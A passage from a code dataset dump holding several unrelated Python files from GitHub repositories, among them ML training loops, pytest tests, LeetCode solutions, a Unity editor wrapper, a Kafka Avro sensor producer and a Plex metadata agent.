axis = 1, keepdims=True)\n soft = dist[8:, 8:] / (dist[8:, 8:] + sum_exp_negs)\n soft = tf.linalg.set_diag(soft, tf.ones(soft.shape[0:-1]))\n loss_rank += tf.reduce_sum(-tf.math.log(soft))\n \n # Mutual ranking\n dist = self.compute_euc(m_y[32:48], m_v[32:48])\n dist = tf.exp(-dist)\n \n sum_exp_all = tf.reduce_sum(dist, axis = 1, keepdims=True)\n soft = tf.linalg.diag_part(dist) / sum_exp_all\n loss_rank += tf.reduce_sum(-tf.math.log(soft))\n \n \n \n # Reconstruction\n loss_rec = 0\n if self.cfg.hmi_par_on:\n y_rec = self.x_decode(z)\n if self.cfg.network_type == 'recurrent':\n loss_y = tf.reduce_mean(self.loss_x(y_rec, y), axis = -1)\n elif self.cfg.network_type == 'dense':\n loss_y = self.loss_x(y_rec, y)[:,-1]\n loss_rec += tf.reduce_sum(loss_y * mask[:,0])\n \n if self.cfg.hmi_img_on:\n x_rec = self.x_img_decode(z)\n if self.cfg.network_type == 'recurrent':\n loss_x = tf.reduce_sum(self.loss_x_img(x_rec, x[:,0::self.cfg.downsample_img]), axis = [1,2,3])\n elif self.cfg.network_type == 'dense':\n loss_x = tf.reduce_sum(self.loss_x_img(x_rec, x[:,-1]), axis = [1,2])\n loss_rec += tf.reduce_sum(loss_x * mask[:,0])\n \n if self.cfg.mdi_on:\n v_rec = self.x2_decode(z)\n if self.cfg.network_type == 'recurrent':\n loss_v = tf.reduce_mean(self.loss_x2(v_rec, v), axis = -1)\n elif self.cfg.network_type == 'dense':\n loss_v = self.loss_x2(v_rec, v)[:,-1]\n loss_rec += tf.reduce_sum(loss_v * mask[:,1])\n 
\n # KL prior\n log_prior = self.kl_prior(m_z, s_z)\n loss_prior = tf.reduce_sum(log_prior)\n \n # Regularization terms (JSD)\n if self.cfg.hmi_par_on and self.cfg.mdi_on:\n d = self.compute_kl(m_y, s_y, m_v, s_v)\n d = tf.linalg.diag_part(d)\n d2 = self.compute_kl(m_v, s_v, m_y, s_y)\n d2 = tf.linalg.diag_part(d2)\n loss_reg = tf.reduce_sum((d+d2)* mask[:,0] * mask[:,1]) * 1\n \n # Response decoding\n if train:\n logits = self.y_decode(z)\n else:\n logits = self.y_decode(m_z)\n loss_class = tf.reduce_sum(self.loss_y(r, logits) * mask[:,2]) * self.cfg.y_coef\n \n loss = 0\n if train:\n loss = 0*loss_rank + 1*loss_rec + 1*loss_prior + 1*loss_class + sum(self.losses)\n\n return tf.reduce_mean(loss), logits, m_z #/ tf.norm(m_z, axis = 1, keepdims = True)","repo_name":"maktukmak/multitask-flare-prediction","sub_path":"model_rnn.py","file_name":"model_rnn.py","file_ext":"py","file_size_in_byte":15178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70300905759","text":"from tqdm.auto import tqdm as tq\nimport numpy as np\nimport torch\n\nfrom os.path import join\n\nclass Runner():\n def __init__(self, model, criterion):\n self.model = model\n self.criterion = criterion\n\n def train(self, train_loader, valid_loader,\n optimizer, scheduler, valid_score_fn,\n n_epochs, train_on_gpu=False, verbose=False, rst_path=None):\n \"\"\"\n \n :param train_loader: \n :param valid_loader: \n :param optimizer: \n :param scheduler: \n :param valid_score_fn: \n :param n_epochs: \n :param train_on_gpu: \n :param verbose: \n :param rst_path: a string. \n Path to the folder where the error and the best model should be stored. \n :return: \n \"\"\"\n\n if train_on_gpu:\n self.model.cuda()\n\n train_loss_list, valid_loss_list, dice_score_list = [], [], []\n lr_rate_list = []\n valid_loss_min = np.Inf\n for epoch in range(1, n_epochs + 1):\n # keep track of training and validation loss\n train_loss = 0.0\n valid_loss = 0.0\n dice_score = 0.0\n\n ###################\n # train the model #\n ###################\n self.model.train()\n\n bar = tq(train_loader, postfix={\"train_loss\": 0.0})\n for data, target in bar:\n # move tensors to GPU if CUDA is available\n if train_on_gpu:\n data, target = data.cuda(), target.cuda()\n optimizer.zero_grad()\n # forward pass: compute predicted outputs by passing inputs to the model\n output = self.model(data)\n\n # calculate the batch loss\n loss = self.criterion(output, target)\n # backward pass: compute gradient of the loss with respect to model parameters\n loss.backward()\n # perform a single optimization step (parameter update)\n optimizer.step()\n\n train_loss += loss.item() * data.size(0)\n # print(\"Loss item: {}, data_size:{}\".format(loss.item(), data.size(0)))\n bar.set_postfix(ordered_dict={\"train_loss\": loss.item()})\n\n ######################\n # validate the model #\n ######################\n self.model.eval()\n del data, target\n with torch.no_grad():\n bar = tq(valid_loader, postfix={\"valid_loss\": 0.0, \"dice_score\": 0.0})\n for data, target in bar:\n # move tensors to GPU if CUDA is available\n if train_on_gpu:\n data, target = data.cuda(), target.cuda()\n\n output = self.model(data)\n loss = self.criterion(output, target)\n # update average validation loss\n valid_loss += loss.item() * data.size(0)\n dice_cof = valid_score_fn(output.cpu(), target.cpu()).item()\n dice_score += dice_cof * data.size(0)\n bar.set_postfix(ordered_dict={\"valid_loss\": loss.item(), \"dice_score\": dice_cof})\n\n # 
calculate average losses\n train_loss = train_loss / len(train_loader.dataset)\n valid_loss = valid_loss / len(valid_loader.dataset)\n dice_score = dice_score / len(valid_loader.dataset)\n train_loss_list.append(train_loss)\n valid_loss_list.append(valid_loss)\n dice_score_list.append(dice_score)\n lr_rate_list.append([param_group['lr'] for param_group in optimizer.param_groups])\n\n # print training/validation statistics\n print('Epoch: {} Training Loss: {:.6f} Validation Loss: {:.6f} Dice Score: {:.6f}'.format(\n epoch, train_loss, valid_loss, dice_score))\n\n if rst_path is not None:\n with open(join(rst_path, 'training_rst.txt'), 'w') as frst:\n frst.write(str(train_loss_list) + '\\n')\n frst.write(str(valid_loss_list) + '\\n')\n frst.write(str(dice_score_list) + '\\n')\n\n # save model if validation loss has decreased\n if valid_loss <= valid_loss_min:\n print('Validation loss decreased ({:.6f} --> {:.6f}). Saving model ...'.format(\n valid_loss_min,\n valid_loss))\n torch.save(self.model.state_dict(), join(rst_path, 'model_cifar.pt'))\n valid_loss_min = valid_loss\n\n scheduler.step(valid_loss)\n\n return train_loss_list, valid_loss_list, dice_score_list, lr_rate_list","repo_name":"lkforward/CloudFlower2","sub_path":"models/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14064305808","text":"#!/usr/bin/env python3\n\"\"\"tests for howler.py\"\"\"\n\nimport os\nimport re\nimport random\nimport string\nfrom subprocess import getstatusoutput, getoutput\n\nprg = './howler.py'\n\n\n# --------------------------------------------------\ndef random_string():\n \"\"\"generate a random string\"\"\"\n\n k = random.randint(5, 10)\n return ''.join(random.choices(string.ascii_letters + string.digits, k=k))\n\n\n# --------------------------------------------------\ndef out_flag():\n \"\"\"Either -o or --outfile\"\"\"\n\n return '-o' if random.randint(0, 1) else '--outfile'\n\n\n# --------------------------------------------------\ndef test_exists():\n \"\"\"exists\"\"\"\n\n assert os.path.isfile(prg)\n\n\n# --------------------------------------------------\ndef test_usage():\n \"\"\"usage\"\"\"\n\n for flag in ['-h', '--help']:\n rv, out = getstatusoutput(f'{prg} {flag}')\n assert rv == 0\n assert re.match(\"usage\", out, re.IGNORECASE)\n\n\n# --------------------------------------------------\ndef test_text_stdout():\n \"\"\"Test STDIN/STDOUT\"\"\"\n\n out = getoutput(f'{prg} \"foo bar baz\"')\n assert out.strip() == 'FOO BAR BAZ'\n\n\n# --------------------------------------------------\ndef test_text_outfile():\n \"\"\"Test STDIN/outfile\"\"\"\n\n out_file = random_string()\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n try:\n out = getoutput(f'{prg} {out_flag()} {out_file} \"foo bar baz\"')\n assert out.strip() == ''\n assert os.path.isfile(out_file)\n text = open(out_file).read().rstrip()\n assert text == 'FOO BAR BAZ'\n finally:\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n\n# --------------------------------------------------\ndef test_file():\n \"\"\"Test file in/out\"\"\"\n\n for expected_file in os.listdir('test-outs'):\n try:\n out_file = random_string()\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n basename = os.path.basename(expected_file)\n in_file = os.path.join('../inputs', basename)\n out = getoutput(f'{prg} {out_flag()} {out_file} {in_file}')\n assert out.strip() == ''\n produced = 
open(out_file).read().rstrip()\n expected = open(os.path.join('test-outs',\n expected_file)).read().strip()\n assert expected == produced\n finally:\n if os.path.isfile(out_file):\n os.remove(out_file)\n","repo_name":"kyclark/tiny_python_projects","sub_path":"05_howler/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":1267,"dataset":"github-code","pt":"51"} +{"seq_id":"14639858254","text":"# http://leetcode.com/problems/maximal-square/\ndef solve(matrix):\n maxCount = 0\n # iterate over the matrix\n # for each cell check if it contains a 1, if it does, increase the size of the square and check again\n for rowIndex, row in enumerate(matrix):\n for valIndex, val in enumerate(row):\n maxColDim = len(matrix[0]) - valIndex\n maxRowDim = len(matrix) - rowIndex\n maxDim = maxColDim if maxColDim < maxRowDim else maxRowDim\n for i in range(maxDim):\n dim = i + 1\n if validateOuterEdges(matrix, rowIndex, valIndex, dim):\n count = dim * dim\n if (count > maxCount):\n maxCount = count\n else:\n break\n\n return maxCount\n\ndef validateArea(matrix, rowOffset, itemOffset, dim):\n for r in range(dim):\n for c in range(dim):\n cix = itemOffset + c\n rix = rowOffset + r\n if matrix[rix][cix] == 0:\n return False\n return True\n\ndef validateOuterEdges(matrix, rowOffset, itemOffset, dim):\n # check column\n for ro in range(dim):\n if matrix[rowOffset+ro][itemOffset+dim-1] == 0:\n return False\n # check row\n for co in range(dim):\n if matrix[rowOffset+dim-1][itemOffset+co] == 0:\n return False\n return True\n\nif __name__ == '__main__':\n count = solve([\n [1, 0, 1, 0, 0],\n [1, 0, 1, 1, 1],\n [1, 1, 1, 1, 1],\n [1, 0, 0, 1, 0]\n ])\n print(f\"expected 4 got {count}\")\n\n count = solve([\n [1, 0, 1, 0, 0, 1],\n [1, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 0],\n [1, 0, 1, 0, 0, 1],\n ])\n print(f\"expected 9 got {count}\")\n\n count = solve([\n [0, 1],\n [1, 0],\n ])\n print(f\"expected 1 got {count}\")\n\n count = solve([\n [1, 0],\n ])\n print(f\"expected 1 got {count}\")\n","repo_name":"chrisolsen/daily-interview-pro","sub_path":"find_largest_square.py","file_name":"find_largest_square.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"12715141691","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import annotations\nfrom datetime import datetime\nfrom json import dumps, loads\nfrom os import chdir, getcwd, walk\nfrom pathlib import Path\nfrom platform import system\nfrom re import match\nfrom shutil import copyfile, move, rmtree\nfrom typing import Callable, List\n\nfrom funity.unity_version import UnityVersion\nfrom funity.util import run_process\n\n\ndef __find_darwin(search_dir: str) -> List[str]:\n search_path = Path(search_dir)\n editor_dirs = []\n for root, dirs, _ in walk(search_path):\n root_path = Path(root)\n if not root_path.name == 'Unity.app':\n continue\n dirs[:] = []\n editor_dirs.append(str(root_path.parent))\n\n return editor_dirs\n\n\ndef __find_linux(search_dir: str) -> List[str]:\n search_path = Path(search_dir)\n editor_dirs = []\n for root, dirs, files in walk(search_path):\n root_path = Path(root)\n if 'Editor' != root_path.name:\n continue\n if 'Unity' not in files:\n continue\n dirs[:] = []\n editor_dirs.append(str(root_path.parent))\n\n return editor_dirs\n\n\ndef __find_windows(search_dir: str) -> List[str]:\n search_path = Path(search_dir)\n 
editor_dirs = []\n for root, dirs, files in walk(search_path):\n root_path = Path(root)\n if 'Editor' != root_path.name:\n continue\n if 'Unity.exe' not in files:\n continue\n dirs[:] = []\n editor_dirs.append(str(root_path.parent))\n\n return editor_dirs\n\n\ndef __get_version_darwin(app: str) -> UnityVersion:\n version = 0, 0, 0, 0\n version_str = str()\n\n def log_func(line: str):\n nonlocal version_str\n if line.startswith(': kMDItemVersion'):\n version_str = line.rstrip()\n\n return_code = run_process(['mdls', app], log_func=log_func)\n\n if return_code == 0 and version_str:\n regex_match = match(':\\\\s*kMDItemVersion\\\\s*=\\\\s*\"Unity version (\\\\d+).(\\\\d+).(\\\\d+)f(\\\\d+)\"', version_str)\n version = tuple(map(int, regex_match.groups()))\n\n return UnityVersion(*version)\n\n\ndef __get_version_linux(app: str) -> UnityVersion:\n return UnityVersion(0, 0, 0, 0)\n\n\ndef __get_version_windows(app: str) -> UnityVersion:\n line_num = 1\n version = 0, 0, 0, 0\n version_str = str()\n\n def log_func(line: str):\n nonlocal line_num\n nonlocal version_str\n if line_num == 4:\n version_str = line.rstrip()\n line_num += 1\n\n app = app.replace('\\\\', '\\\\\\\\')\n return_code = run_process(['wmic', 'datafile', 'where', f'Name=\"{app}\"', 'get', 'Version'], log_func=log_func)\n\n if return_code == 0 and version_str:\n regex_match = match(': (\\\\d+).(\\\\d+).(\\\\d+).(\\\\d+)', version_str)\n version = tuple(map(int, regex_match.groups()))\n\n return UnityVersion(*version)\n\n\nunity_platform = {\n 'Darwin': {\n 'app': 'Unity.app',\n 'exec': 'Unity.app/Contents/MacOS/Unity',\n 'data': 'Unity.app/Contents',\n 'libcache': [\n 'Unity.app/Contents/Managed/UnityEngine',\n 'Unity.app/Contents/Resources/PackageManager/ProjectTemplates/libcache',\n ],\n 'mono_bin': 'Unity.app/Contents/MonoBleedingEdge/bin',\n 'mcs': 'Unity.app/Contents/MonoBleedingEdge/bin/mcs',\n 'find': (__find_darwin, ['/Applications']),\n 'get_version': __get_version_darwin\n },\n 'Linux': {\n 'app': 'Editor/Unity',\n 'exec': 'Editor/Unity',\n 'data': 'Editor/Data',\n 'libcache': [\n 'Editor/Data/Managed/UnityEngine',\n 'Editor/Data/Resources/PackageManager/ProjectTemplates/libcache',\n ],\n 'mono_bin': 'Editor/Data/MonoBleedingEdge/bin',\n 'mcs': 'Editor/Data/MonoBleedingEdge/bin/mcs',\n 'find': (__find_linux, ['/opt']),\n 'get_version': __get_version_linux\n },\n 'Windows': {\n 'app': 'Editor/Unity.exe',\n 'exec': 'Editor/Unity.exe',\n 'data': 'Editor/Data',\n 'libcache': [\n 'Editor/Data/Managed/UnityEngine',\n 'Editor/Data/Resources/PackageManager/ProjectTemplates/libcache',\n ],\n 'mono_bin': 'Editor/Data/MonoBleedingEdge/bin',\n 'mcs': 'Editor/Data/MonoBleedingEdge/bin/mcs.bat',\n 'find': (__find_windows, ['C:/Program Files', 'C:/Program Files (x86)']),\n 'get_version': __get_version_windows\n },\n}\n\n\nclass UnityEditor(object):\n\n path: Path\n exec: Path\n mcs: Path\n version: UnityVersion\n\n def __init__(self, editor_dir: str):\n sys = system()\n self.path = Path(editor_dir)\n self.exec = self.path / unity_platform[sys]['exec']\n self.mcs = self.path / unity_platform[sys]['mcs']\n self.version = unity_platform[sys]['get_version'](str(self.path / unity_platform[sys]['app']))\n\n if not self.exec.exists():\n raise Exception('Executable not found')\n\n def __repr__(self):\n return str(self.path)\n\n @staticmethod\n def find_all(*args: str) -> List[UnityEditor]:\n sys = system()\n if sys not in unity_platform.keys():\n raise NotImplementedError\n func, dirs = unity_platform[sys]['find']\n search_dirs = []\n 
search_dirs.extend(dirs if len(args) == 0 else\n list(filter(lambda p: Path(p).is_dir(), args)))\n editor_dirs = []\n for d in search_dirs:\n editor_dirs.extend(func(d))\n editors = [UnityEditor(e) for e in editor_dirs]\n\n return editors\n\n @staticmethod\n def find_in(*args: str,\n cache: str = None) -> List[UnityEditor]:\n if cache is not None:\n cache_path = Path(cache)\n if cache_path.exists():\n editor_dirs = loads(cache_path.read_text())\n return [UnityEditor(e) for e in editor_dirs]\n else:\n editors = UnityEditor.find_all(*args)\n editor_dirs = [str(e) for e in editors]\n cache_path.touch()\n cache_path.write_text(dumps(editor_dirs, indent=2))\n return editors\n else:\n return UnityEditor.find_all(*args)\n\n @staticmethod\n def find_libcache(editor: UnityEditor) -> List[str]:\n return [str(editor.path / d) for d in unity_platform[system()]['libcache']]\n\n @staticmethod\n def find_libs(editor: UnityEditor) -> List[str]:\n libs = {}\n for d in editor.get_libcache():\n libcache_path = Path(d)\n for root, _, files in walk(str(libcache_path)):\n root_path = Path(root)\n for f in files:\n file_path = Path(f)\n if not '.dll' == file_path.suffix:\n continue\n file_name = str(file_path.name)\n if file_name in libs.keys():\n continue\n libs[file_name] = str(root_path / file_path)\n\n return list(libs.values())\n\n def compile(self, *args: str,\n defines: List[str] = None,\n debug: bool = False,\n doc: str = None,\n nostdlib: bool = False,\n nowarn: List[str] = None,\n optimize: bool = False,\n out: str = None,\n references: List[str] = None,\n stacktrace: bool = False,\n target: str = None,\n unsafe: bool = False,\n warnaserror: List[str] = None,\n log_func: Callable[[str], None] = None) -> int:\n cwd_path = Path(getcwd())\n tmp_path = cwd_path / f'tmp-{datetime.now().strftime(\"%Y%m%d%H%M%S\")}'\n tmp_path.mkdir()\n command = [str(self.mcs)]\n if defines is not None:\n command.append(f'-d:{\";\".join(defines)}')\n if debug:\n command.append('-debug')\n if doc is not None:\n command.append(f'-doc:{doc}')\n if nostdlib:\n command.append('-nostdlib')\n if nowarn is not None:\n command.append(f'-nowarn:{\",\".join(nowarn)}')\n if optimize:\n command.append('-optimize')\n if out is not None:\n command.append(f'-out:{out}')\n refs = []\n for r in references if references is not None else []:\n r_path = Path(r)\n if r_path.exists():\n r_name = r_path.name\n copyfile(str(r_path), str(tmp_path / r_name))\n refs.append(r_name)\n if len(refs) > 0:\n command.append(f'-r:{\",\".join(refs)}')\n if stacktrace:\n command.append('--stacktrace')\n if target is not None and target in ['exe', 'library', 'module', 'winexe']:\n command.append(f'-t:{target}')\n if unsafe:\n command.append('-unsafe')\n if warnaserror is not None:\n command.append(f'-warnaserror:{\",\".join(warnaserror)}')\n for f in args:\n f_path = Path(f)\n if f_path.exists():\n f_name = f_path.name\n copyfile(str(f_path), str(tmp_path / f_name))\n command.append('*.cs')\n try:\n chdir(str(tmp_path))\n return_code = run_process(command, log_func=log_func)\n if return_code == 0:\n if out is not None:\n out_path = tmp_path / out\n if out_path.exists():\n move(str(out_path), str(cwd_path / out))\n if doc is not None:\n doc_path = tmp_path / doc\n if doc_path.exists():\n move(str(doc_path), str(cwd_path / doc))\n finally:\n chdir(str(cwd_path))\n rmtree(str(tmp_path), ignore_errors=True)\n\n return return_code\n\n def get_libcache(self) -> List[str]:\n return UnityEditor.find_libcache(self)\n\n def get_libs(self) -> List[str]:\n return 
UnityEditor.find_libs(self)\n\n def run(self, *args: str,\n cli: bool = True,\n log_func: Callable[[str], None] = None) -> int:\n command = [str(self.exec)]\n command.extend(args)\n if cli:\n for o in ['-batchmode', '-nographics', '-quit', '-silent-crashes']:\n if o not in command:\n command.append(o)\n\n return run_process(command, log_func=log_func)\n","repo_name":"Fopoon/funity","sub_path":"funity/unity_editor.py","file_name":"unity_editor.py","file_ext":"py","file_size_in_byte":10397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42555849730","text":"def maximum69Number (num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n num = str(num)\n results = [int(num)]\n for i in range(0, len(num)):\n curr = num[i]\n newnum = list(num)\n if curr == '6':\n newnum[i] = '9'\n results.append(int(''.join(newnum)))\n return max(results)\n ","repo_name":"salitayu/daily-programming","sub_path":"maximum69Number.py","file_name":"maximum69Number.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29797273837","text":"#algorimo de la burbuja para adivinar numeros( entre 0-100)\nimport random\nlower = 0\nupper = 100\ndecidir = \"n\"\nwhile decidir == \"n\":\n numeroResultado = random.randrange(lower,upper)\n decidir = input(f\"Tu numero es {numeroResultado} (s/n): \")\n if decidir == \"n\":\n pista = input(\"El número es mayor o menor(h/l): \")\n if pista == \"h\":\n lower = numeroResultado+1\n if pista ==\"l\":\n upper = numeroResultado","repo_name":"alejoc13/IA-models","sub_path":"adivinar_numero.py","file_name":"adivinar_numero.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40641002780","text":"from confluent_kafka import SerializingProducer\nfrom confluent_kafka.serialization import StringSerializer\nfrom confluent_kafka.schema_registry import SchemaRegistryClient\nfrom confluent_kafka.schema_registry.avro import AvroSerializer\nfrom confluent_kafka.schema_registry import record_subject_name_strategy\nfrom datetime import datetime\nimport toml\nimport argparse\nfrom sensor import sensor\nfrom time import sleep\n\n\nclass Event(object):\n \"\"\"\n An object representing a sensor event\n\n Args:\n id (str): Sensor's id\n\n timestamp (datetime): timestamp when the event happened\n\n value (double): Sensor's reading value\n\n \"\"\"\n def __init__(self, id, timestamp, value):\n self.id = id\n self.timestamp = timestamp\n self.value = value\n\n\ndef event_to_dict(event, ctx):\n \"\"\"\n Returns a dict representation of a sensor Event instance for serialization.\n\n Args:\n event (Event): Event instance.\n\n ctx (SerializationContext): Metadata pertaining to the serialization\n operation.\n\n Returns:\n dict: Dict populated with sensor event attributes to be serialized.\n\n \"\"\"\n return dict(id=event.id,\n timestamp=event.timestamp,\n value=event.value)\n\n\ndef delivery_report(err, msg):\n \"\"\"\n Reports the failure or success of a message delivery.\n\n Args:\n err (KafkaError): The error that occurred on None on success.\n\n msg (Message): The message that was produced or failed.\n\n Note:\n In the delivery report callback the Message.key() and Message.value()\n will be the binary format as encoded by any configured Serializers and\n not the same object that was passed to produce().\n If you wish to pass the original object(s) 
for key and value to delivery\n report callback we recommend a bound callback or lambda where you pass\n the objects along.\n\n \"\"\"\n if err is not None:\n print(\"Delivery failed for sensor Event {}: {}\".format(msg.key(), err))\n return\n print('Sensor Event {} successfully produced to {} [{}] at offset {}'.format(\n msg.key(), msg.topic(), msg.partition(), msg.offset()))\n\n\ndef main():\n\n # Parse arguments\n parser = argparse.ArgumentParser(description='Produces time series data from emulated '\n 'sensors into a kafka topic hosted at a HopsWorks cluster.')\n parser.add_argument(\"-c\", \"--config\", default='config.toml',\n help='Configuration file in toml format.')\n parser.add_argument(\"-t\", \"--time\", default=0, type=int,\n help='Start time step for the time series generator. Used to resume '\n 'generating the time series after stopping the program.')\n parser.add_argument(\"-e\", \"--events\", default=1000, type=int,\n help='Number of events to generate per sensor. Negative for infinite number.')\n parser.add_argument(\"-d\", \"--delay\", default=0.5, type=float,\n help='Delay between events in second. Can be float.')\n args = parser.parse_args()\n\n # Load HopsWorks Kafka configuration\n conf = toml.load(args.config)\n\n # Kafka schema that this program supports/expects\n # The schema will be checked against the schema of the Kafka topic\n schema_str = \"\"\"\n {\n \"type\": \"record\",\n \"name\": \"sensor\",\n \"fields\": [\n {\n \"name\": \"timestamp\",\n \"type\": {\n \"type\": \"long\",\n \"logicalType\": \"timestamp-millis\"\n }\n },\n {\n \"name\": \"id\",\n \"type\": \"string\"\n },\n {\n \"name\": \"value\",\n \"type\": \"double\"\n }\n ]\n }\n \"\"\"\n\n # url for the schema registry in HopsWorks REST API services\n registry_url = 'https://' + conf['hops']['url']\\\n + conf['api']['base'] + '/project/'+conf['project']['id']+'/kafka'\n\n # Initialise the Confluent schema registry client\n schema_registry_conf = {'url': registry_url, 'ssl.ca.location': conf['hops']['verify']}\n schema_registry_client = SchemaRegistryClient(schema_registry_conf)\n\n # Add the API key required by HopsWorks but not configurable through the confluent schema registry client\n headers = {'Authorization': 'ApiKey ' + conf['api']['key']}\n schema_registry_client._rest_client.session.headers.update(headers)\n\n # Initialize the avro serializer for the value using the schema\n avro_serializer = AvroSerializer(schema_registry_client,\n schema_str,\n event_to_dict,\n {'auto.register.schemas': False, 'subject.name.strategy': record_subject_name_strategy})\n\n # Initialize a simple String serializer for the key\n string_serializer = StringSerializer('utf_8')\n\n # Initialize the producer\n producer_conf = {'bootstrap.servers': conf['hops']['url']+':'+conf['kafka']['port'],\n 'security.protocol': 'SSL',\n 'ssl.ca.location': conf['project']['ca_file'],\n 'ssl.certificate.location': conf['project']['certificate_file'],\n 'ssl.key.location': conf['project']['key_file'],\n 'ssl.key.password': conf['project']['key_password'],\n 'key.serializer': string_serializer,\n 'value.serializer': avro_serializer}\n producer = SerializingProducer(producer_conf)\n\n # Initialize a number of sensors\n start = args.time\n end = start + args.events if args.events > 0 else -1\n sensors = [\n sensor(baseline=10, slope=0.1, period=100, amplitude=40, noise_level=5, start=start, end=end),\n sensor(baseline=10, slope=0.2, period=50, amplitude=30, noise_level=4, start=start, end=end),\n sensor(baseline=20, slope=-0.1, 
period=100, amplitude=50, noise_level=6, phase=20, start=start, end=end),\n sensor(baseline=10, slope=0.1, period=100, amplitude=40, noise_level=0, start=start, end=end),\n sensor(baseline=30, slope=-0.1, period=100, amplitude=40, noise_level=5, start=start, end=end),\n sensor(baseline=40, slope=0, period=200, amplitude=10, noise_level=4, start=start, end=end),\n sensor(baseline=0, slope=0.3, period=100, amplitude=20, noise_level=6, phase=50, start=start, end=end),\n sensor(baseline=-10, slope=0.1, period=100, amplitude=40, noise_level=9, start=start, end=end),\n ]\n\n # Start producing events\n print(\"Producing sensor events to topic {}.\".format(conf['kafka']['topic']))\n print('Press Ctrl-c to exit.')\n time_step = start # a counter for the number of time steps generated\n try:\n for data in zip(*sensors):\n timestamp = datetime.now()\n time_step += 1\n for i, d in enumerate(data):\n # Serve on_delivery callbacks from previous calls to produce()\n producer.poll(0.0)\n try:\n event = Event(id='sensor'+str(i),\n timestamp=timestamp,\n value=d)\n producer.produce(topic=conf['kafka']['topic'], key=event.id, value=event,\n on_delivery=delivery_report)\n except KeyboardInterrupt:\n break\n except ValueError:\n print(\"Invalid input, discarding record...\")\n continue\n sleep(args.delay)\n except KeyboardInterrupt:\n print('\\nStopping...')\n\n print(\"Flushing records...\")\n producer.flush()\n print('To continue execution start from event {}'.format(time_step))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"alshishtawy/hopsworks-examples","sub_path":"kafka/avro_producer.py","file_name":"avro_producer.py","file_ext":"py","file_size_in_byte":7797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"1272156114","text":"# -*- coding: utf-8 -*-\nfrom meta import KinopoiskMeta, MovieDBMeta\n\n\ndef Start():\n HTTP.CacheTime = CACHE_1WEEK\n\n\nclass KinopoiskAgent(Agent.Movies):\n name = 'Kinopoisk'\n languages = [Locale.Language.Russian]\n primary_provider = True\n fallback_agent = False\n accepts_from = ['com.plexapp.agents.localmedia']\n contributes_to = ['com.plexapp.agents.kinopoiskru']\n\n # search #\n def search(self, results, media, lang, manual=False):\n continuesearch = True\n kp = KinopoiskMeta(media, lang)\n if media.guid:\n continuesearch = kp.external_search(results, manual)\n if continuesearch:\n kp.search(results, manual)\n\n # update #\n def update(self, metadata, media, lang, force=False):\n if not metadata.id:\n return None\n kp = KinopoiskMeta(media, lang)\n kp.getdata(metadata, force)\n\n mdb = MovieDBMeta(media, lang)\n mdb.getdata(metadata, force)\n \n #extras\n if Prefs['extras_source'] == u'Plex IVA':\n mdb.extras(metadata)\n elif Prefs['extras_source'] == u'Кинопоиск':\n kp.extras(metadata)\n elif Prefs['extras_source'] == u'Все источники':\n if Prefs['extras_seq'] == u'Кинопоиск, Plex IVA':\n kp.extras(metadata)\n if len(metadata.extras) == 0:\n mdb.extras(metadata)\n elif Prefs['extras_seq'] == u'Plex IVA, Кинопоиск':\n mdb.extras(metadata)\n if len(metadata.extras) == 0:\n kp.extras(metadata)\n else:\n kp.extras(metadata)\n mdb.extras(metadata)","repo_name":"OMEGAYALFA/Kinopoisk","sub_path":"Kinopoisk.bundle/Contents/Code/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73564102238","text":"'''\r\n\tGiven a string S, consider all duplicated substrings: 
(contiguous) substrings of S that occur 2 or more times. (The occurrences may overlap.)\r\n\r\nReturn any duplicated substring that has the longest possible length. (If S does not have a duplicated substring, the answer is \"\".)\r\n\r\n \r\n\r\nExample 1:\r\n\r\nInput: \"banana\"\r\nOutput: \"ana\"\r\nExample 2:\r\n\r\nInput: \"abcd\"\r\nOutput: \"\"\r\n \r\n\r\nNote:\r\n\r\n2 <= S.length <= 10^5\r\nS consists of lowercase English letters.\r\n Hide Hint #1 \r\nBinary search for the length of the answer. (If there's an answer of length 10, then there are answers of length 9, 8, 7, ...)\r\n Hide Hint #2 \r\nTo check whether an answer of length K exists, we can use Rabin-Karp's algorithm.\r\n\r\n\r\n'''\r\n\r\nfrom collections import defaultdict\r\n\r\nPRIME = 10 ** 9 + 7\r\nBASE = 26\r\nclass Solution:\r\n def longestDupSubstring(self, S: str) -> str:\r\n def obtain_dup_substring(S, len_substr):\r\n max_base = pow(BASE, len_substr - 1, PRIME)\r\n hash = 0\r\n for char in S[:len_substr]:\r\n hash = (hash * BASE + ord(char)) % PRIME\r\n hash_to_idx = defaultdict(list)\r\n hash_to_idx[hash].append(len_substr - 1)\r\n for i, char in enumerate(S[len_substr:], start=len_substr):\r\n char_deleted = S[i - len_substr]\r\n hash -= ord(char_deleted) * max_base\r\n hash = (hash * BASE + ord(char)) % PRIME\r\n if hash in hash_to_idx:\r\n substr = S[i - len_substr + 1:i + 1]\r\n for end_idx in hash_to_idx[hash]:\r\n if S[end_idx - len_substr + 1:end_idx + 1] == substr:\r\n return substr\r\n else:\r\n hash_to_idx[hash].append(i)\r\n else:\r\n 